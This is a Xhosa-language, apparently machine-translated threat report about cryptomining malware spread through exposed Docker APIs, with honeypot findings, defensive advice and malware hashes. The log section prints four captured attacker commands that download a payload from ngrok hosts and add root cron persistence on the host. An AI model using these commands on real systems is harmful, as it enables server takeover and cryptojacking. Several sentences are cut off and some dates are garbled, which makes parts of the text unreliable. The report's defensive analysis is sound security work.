Sihlalutye idatha eqokelelwe kusetyenziswa izitya ze-honeypot, esizenzileyo ukulandelela izoyikiso. Kwaye sibhaqe umsebenzi obalulekileyo ovela kubasebenzi basezimayini abangafunwayo okanye abangagunyaziswanga be-cryptocurrency bebekwe njengezikhongozeli ezikhohlakeleyo zisebenzisa umfanekiso opapashwe kuluntu kwi-Docker Hub. Umfanekiso usetyenziswa njengenxalenye yenkonzo ehambisa abasebenzi basezimayini abakhohlakeleyo be-cryptocurrency.
Ukongeza, iinkqubo zokusebenza kunye nothungelwano zifakelwe ukungena kwizikhongozeli ezivulekileyo ezingabamelwane kunye nezicelo.
Sishiya iipothi zethu zobusi njengoko zinjalo, oko kukuthi, ngokusetwa okungagqibekanga, ngaphandle kwamanyathelo okhuseleko okanye ukufakwa okulandelayo kwesoftware eyongezelelweyo. Nceda uqaphele ukuba iDocker ineengcebiso zokuseta okokuqala ukunqanda iimpazamo kunye nokuba semngciphekweni okulula. Kodwa iimbiza zobusi ezisetyenzisiweyo zizikhongozeli, ezenzelwe ukukhangela uhlaselo olujolise kwiqonga leekhonteyina, hayi usetyenziso olungaphakathi kwizikhongozeli.
Umsebenzi ongalunganga ofunyenweyo uyaphawuleka kuba awufuni ukuba semngciphekweni kwaye uzimele kuhlobo lweDocker. Ukufumana uqwalaselo olungachanekanga, kwaye ke ngoko luvulekileyo, umfanekiso wesikhongozeli yiyo yonke into abahlaseli abayidingayo ukosulela iiseva ezininzi ezivulekileyo.
I-Docker API engavaliwe ivumela umsebenzisi ukuba enze uluhlu olubanzi lwe
Ekhohlo yindlela yokuhanjiswa kwe-malware. Ngasekunene yindawo engqongileyo yomhlaseli, evumela ukuqengqeleka kude kwemifanekiso.
Ukusasazwa kwilizwe le-3762 evulekileyo ye-Docker APIs. Ngokusekwe kukhangelo lweShodan lomhla we-12.02.2019/XNUMX/XNUMX
Uhlaselo lwekhonkco kunye nokhetho lomthwalo wokuhlawula
Umsebenzi okhohlakeleyo awubonwanga kuphela ngoncedo lwee-honeypots. Idatha esuka kwi-Shodan ibonisa ukuba inani le-APIs ye-Docker eveziweyo (jonga igrafu yesibini) iye yanda ukususela ekubeni siphanda isitya esingafanelekanga esisetyenziswe njengebhulorho yokubeka isoftware ye-Monero cryptocurrency mining. Ngo-Oktobha kunyaka ophelileyo (2018, idatha yangoku
Uphononongo lwezigodo zembiza yobusi lubonise ukuba ukusetyenziswa komfanekiso wesikhongozeli nako kwayanyaniswa nokusetyenziswa kwe
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Njengoko ubona, iifayile ezilayishiwe zikhutshelwa kwii-URL ezitshintsha rhoqo. Ezi URLs zinomhla omfutshane wokuphelelwa, ngoko ke umthwalo awukwazi ukukhutshelwa emva kokuphelelwa kwexesha.
Kukho iindlela ezimbini zokukhetha umvuzo. Eyokuqala yi-ELF i-miner ehlanganisiweyo ye-Linux (echazwa njenge-Coinminer.SH.MALXMR.ATNO) edibanisa kwi-pool yezimayini. Okwesibini siscript (TrojanSpy.SH.ZNETMAP.A) eyilelwe ukufumana izixhobo ezithile zenethiwekhi ezisetyenziselwa ukuskena uluhlu lwenethiwekhi emva koko ukukhangela iithagethi ezintsha.
Iskripthi se-dropper siseta izinto ezimbini eziguquguqukayo, ezithi ke zisetyenziswe ukuhambisa i-cryptocurrency miner. I-variable ye-HOST iqulethe i-URL apho iifayile ezinobungozi zikhoyo, kwaye i-RIP eguquguqukayo ligama lefayile (enyanisweni, i-hash) yomgcini-mgodi oza kuthunyelwa. Utshintsho lwe-HOST lutshintsha lonke ixesha utshintsho lwe-hash. Isikripthi sikwazama ukujonga ukuba akukho nanye abasebenzi basezimayini be-cryptocurrency abaqhuba kwiseva ehlaselweyo.
Imizekelo ye-HOST kunye ne-RIP eguquguqukayo, kunye nekhowudi yesnippet esetyenziselwa ukujonga ukuba akukho abanye abasebenzi basezimayini abasebenzayo.
Ngaphambi kokuba uqalise umsebenzi-mgodini, ubizwa ngokuba ngu-nginx. Ezinye iinguqulelo zolu shicilelo zithiya ngokutsha umsebenzi-mgodini kwezinye iinkonzo ezisemthethweni ezinokuthi zibekhona kwiimeko zeLinux. Oku kuqhele ukwanela ukugqitha iitshekhi ngokuchasene noluhlu lweenkqubo ezisebenzayo.
Iskripthi sokukhangela sikwanazo neempawu. Isebenza kunye nenkonzo ye-URL efanayo ukuhambisa izixhobo eziyimfuneko. Phakathi kwazo kukho i-zmap yokubini, esetyenziselwa ukuskena uthungelwano kwaye ufumane uluhlu lwamazibuko avulekileyo. Isikripthi siphinde silayishe enye ibhinari esetyenziselwa ukusebenzisana neenkonzo ezifunyenweyo kunye nokufumana amabhanari avela kubo ukucacisa ulwazi olongezelelweyo malunga nenkonzo efunyenweyo (umzekelo, inguqulo yayo).
Iskripthi sikwamisela kwangaphambili ezinye izintlu zenethiwekhi ukuze ziskenwe, kodwa oku kuxhomekeke kuguqulelo lweskripthi. Ikwaseta amachweba ekujoliswe kuwo kwiinkonzo-kule meko, iDocker-ngaphambi kokuqhuba iskena.
Ngokukhawuleza ukuba iithagethi ezinokwenzeka zifunyenwe, amabhanari asuswa ngokuzenzekelayo kuwo. Iskripthi siphinda sihluze iithagethi ngokuxhomekeke kwiinkonzo, izicelo, amacandelo okanye amaqonga anomdla: Redis, Jenkins, Drupal, MODX,
Ivector yohlaselo ngumfanekiso weDocker, njengoko unokubonwa kwiziqwenga ezimbini ezilandelayo zekhowudi.
Phezulu kukuqamba ngokutsha kwinkonzo esemthethweni, kwaye ezantsi yindlela i-zmap esetyenziswa ngayo ukuskena uthungelwano.
Phezulu kukho uluhlu lwenethiwekhi oluchazwe kwangaphambili, ezantsi kukho amazibuko athile okukhangela iinkonzo, kubandakanya iDocker
Umfanekiso weskrini ubonisa ukuba umfanekiso we-alpine-curl ukhutshelwe ngaphezu kwezigidi ezili-10
Ngokusekwe kwiAlpine Linux kunye ne-curl, isixhobo esisebenzayo se-CLI sokuhambisa iifayile kwiiprotocol ezahlukeneyo, unokwakha
Kubalulekile ukuba uqaphele ukuba lo mfanekiso (i-alpine-curl) ngokwayo ayibi, kodwa njengoko ubona ngasentla, ingasetyenziselwa ukwenza imisebenzi engalunganga. Imifanekiso yeDocker efanayo inokusetyenziselwa ukwenza imisebenzi engalunganga. Siqhagamshelene noDocker kwaye sasebenza nabo kulo mbandela.
Iingcebiso
Isiganeko ekuxutyushwa ngaso kweli nqaku sibalaselisa imfuneko yokunikela ingqalelo kukhuseleko kwasekuqaleni, kuquka la macebiso alandelayo:
- Kubalawuli benkqubo kunye nabaphuhlisi: Soloko ujonga iisetingi zakho zeAPI ukuze uqiniseke ukuba yonke into iqwalaselwe ukuba yamkele izicelo ezisuka kumncedisi othile okanye inethiwekhi yangaphakathi.
- Landela umgaqo wamalungelo amancinci: qinisekisa ukuba imifanekiso yesikhongozeli isayinwe kwaye iqinisekisiwe, ukunciphisa ukufikelela kumacandelo abalulekileyo (inkonzo yokuqalisa isikhongozeli) kwaye ungeze uguqulelo oluntsonkothileyo kunxibelelwano lwenethiwekhi.
- Landela
iingcebiso kunye nokwenza iindlela zokhuseleko, umz.ukusuka eDocker kwaye yakhelwe ngaphakathiiimpawu zokhuseleko . - Sebenzisa ukuskena okuzenzekelayo kwamaxesha okusebenza kunye nemifanekiso ukufumana ulwazi olongezelelweyo malunga neenkqubo ezisebenza kwisikhongozeli (umzekelo, ukufumanisa i-spoofing okanye ukukhangela ubuthathaka). Ulawulo lwesicelo kunye nokubeka iliso kwintembeko kunceda ukulandelela utshintsho olungaqhelekanga kwiiseva, iifayile, kunye neendawo zenkqubo.
I-Trendmicro inceda amaqela e-DevOps ukuba akhe ngokukhuselekileyo, akhuphe ngokukhawuleza, kwaye aqalise naphi na. Trend Micro
Iimpawu zokulalanisa
Iiheshi ezinxulumeneyo:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
phezu
umthombo: www.habr.com